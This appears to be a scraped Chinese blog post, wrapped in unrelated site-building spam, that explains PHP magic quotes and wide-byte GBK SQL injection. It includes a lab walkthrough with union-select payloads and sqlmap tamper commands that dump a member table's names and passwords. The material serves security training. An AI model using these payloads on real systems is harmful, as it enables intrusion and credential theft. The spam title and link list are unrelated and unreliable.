当前位置: 首页 > news >正文

千图主站的功能介绍莆田个人仿牌外贸网站建设

千图主站的功能介绍,莆田个人仿牌外贸网站建设,你们交学费做网站,嘉兴网站开发公司电话magic_quotes_gpc#xff08;魔术引号开关#xff09; https://www.cnblogs.com/timelesszhuang/p/3726736.html magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据#xff0c;如包括有#xff1a;post、get、cookie过来的数据增加转义字符“\”#xff0c;以…magic_quotes_gpc魔术引号开关 https://www.cnblogs.com/timelesszhuang/p/3726736.html magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据如包括有post、get、cookie过来的数据增加转义字符“\”以确保这些数据不会引起程序特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号’、双引号”、反斜线\等字符都会被加上反斜线 magic_quotes_gpc的作用当PHP的传参中有特殊字符就会再前面加转义字符\,来做一定的过滤 addslashes()函数 二者关系 php get_magic_quotes_gpc() stripslashes()和addslashes()的关系-CSDN博客  PHP为了安全性所以引入了个magic_quotes_gpc On的功能可以不需要做任何处理就能直接把单引号插入数据库中那么对于Off时则需要考虑单引号的问题了而不是一味地信任运行环境。 当magic_quotes_gpc On时使用了addslashes()处理后的数据在数据库中将以\形式保存如果此时直接输出的话就会发现比自己期待的内容多了个\因此stripslashes()出场了它能把\去掉区别于str_replace(”\”, “”,$Str)。 当magic_quotes_gpc Off时使用了addslashes()处理后的数据在数据库中将以形式保存没有上面说的有\的问题addslashes()起到插入数据不出错的作用如果此时直接输出的话数据正常。不需要再用stripslashes()。addslashes()和stripslashes()正好是相反的直接记忆addslashes()加个\stripslashes()去个\ 那么什么时候用呢 简单说 当magic_quotes_gpc On时系统会自动处理单引号等问题用不用addslashes()和stripslashes()都没关系但是如果添加数据时用了addslashes()那么显示数据时必须要stripslashes() 当magic_quotes_gpc Off时系统不会处理单引号等问题所以插入数据时必须要使用addslashes()显示数据时则不需要使用stripslashes()。 既然有了分析做程序时要怎么办呢根据以上两种情况可得 不管magic_quotes_gpc是On还是Off添加数据时用addslashes()当On时必须使用stripslashes()Off时则不能用stripslashes()。 为了绕过magic_quotes_gpc的\,于是乎我们开始导入宽字节的概念 我们发现\的编码是%5c然后我们会想到传参一个字符想办法凑成一个gbk字符,例如‘運’字是%df%5c SELECT * FROM users WHERE id1\ LIMIT 0,1 这条语句因为\使我们无法去注入那么我们是不是可以用%df吃到%5c,因为如果用GBK编码的话这个就是運然后成功的让 SELECT * FROM users WHERE id1\# LIMIT 0,1 \ 实际上就是那个運字 宽字节概念 1、单字节字符集所有的字符都使用一个字节来表示比如 ASCII 编码(0-127) 2、多字节字符集在多字节字符集中一部分字节用多个字节来表示另一部分可能没有用单个字节来表示。 3、UTF-8 编码 是一种编码的编码方式多字节编码它可以使用1~4个字节表示一个符号根据不同的符号而变化字节长度。 4、宽字节注入时利用mysql的一个特性使用GBK编码的时候会认为两个字符是一个汉字 宽字节sql注入 宽字节SQL注入就是PHP发送请求到MySql时使用了语句 SET NAMES gbk 或是SET character_set_client gbk 进行了一次编码但是又由于一些不经意的字符集转换导致了宽字节注入。 实战墨者 手工 找到注入点 发现35是回显点 ?id-1%df union select 1,2,database(),4,5--?id-1%df union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schemadatabase() -- 然后我们在查询列名的时候发现因为单引号无法闭合而报错 ?id-1%df union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_namestormgroup_member -- 这里应该怎么解决呢 看了wp转成了十六进制 嗯。。不错 payload ?id-1%df union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name0x73746f726d67726f75705f6d656d626572 -- 有了 ?id-1%df union select 1,2,3,4,group_concat(name) from stormgroup_member --?id-1%df union select 1,2,3,4,group_concat(password) from stormgroup_member -- tamper sqlmap.py -u http://124.70.71.251:48968/new_list.php?id1 --tamperunmagicquotes.py --dbs sqlmap.py -u http://124.70.71.251:48968/new_list.php?id1 --tamperunmagicquotes.py -D mozhe_discuz_stormgroup --tables sqlmap.py -u http://124.70.71.251:48968/new_list.php?id1 --tamperunmagicquotes.py -D mozhe_discuz_stormgroup -T stormgroup_member --columns sqlmap.py -u http://124.70.71.251:48968/new_list.php?id1 --tamperunmagicquotes.py -D mozhe_discuz_stormgroup -T stormgroup_member --dump
http://www.dnsts.com.cn/news/250848.html

相关文章:

  • 网站结构怎么做适合优化繁体企业网站源码
  • 吉林省建设厅门户网站小程序商城需要办什么证
  • 许昌网站制作公司空间安装wordpress
  • 网站访客qq系统百度公司网站怎么建设
  • 桂林网站seo横峰网站建设
  • 快速搭建网站后天台wordpress和discuz整合
  • 做网站网站的人是怎么被抓的打开全网搜索
  • 沈阳蓝德网站建设上海网站快速排名
  • 红和蓝的企业网站设计集团网站制作公司
  • 国内论坛网站有哪些网站备案证书怎么下载不了
  • 江苏宜安建设有限公司网站西数网站管理助手
  • 拖拽式可视化编辑网站网站设计怎么划分块
  • 在线推广是网站推广的首要工具深圳3d网站建设
  • 昆明网站推广哪家好飞机加速器
  • 网站推广效果的评价指标购物网站如何做推广
  • 服务网站欣赏互联网乌镇峰会
  • 国家企业信用信息公示网查询系统网站优化包括哪些内容
  • 为什么做的网站预览出来什么都没有医学教育网站建设方案
  • 免费广告行业网站建设网站源代码分列怎么做
  • 两学一做网站 苏州建设工程交易中心是什么
  • 网站被k广安做网站公司
  • 企业做网站被骗江苏省建设招标网站首页
  • 重庆微信网站制作专家做徽章标牌的企业网站
  • 重庆网站备案系统外包公司
  • 做 英语试题的网站网站开发项目教程任务分解
  • 做网站在哪买域名微信开发者平台取消授权
  • 微信分销网站建设用途天津外贸营销型网站建设
  • 建设网贷网站怎么安装wordpress模板安装教程
  • 晋城做网站公司上海网站制作哪家奿
  • 网站怎么更新文章浙江省建筑信息港官网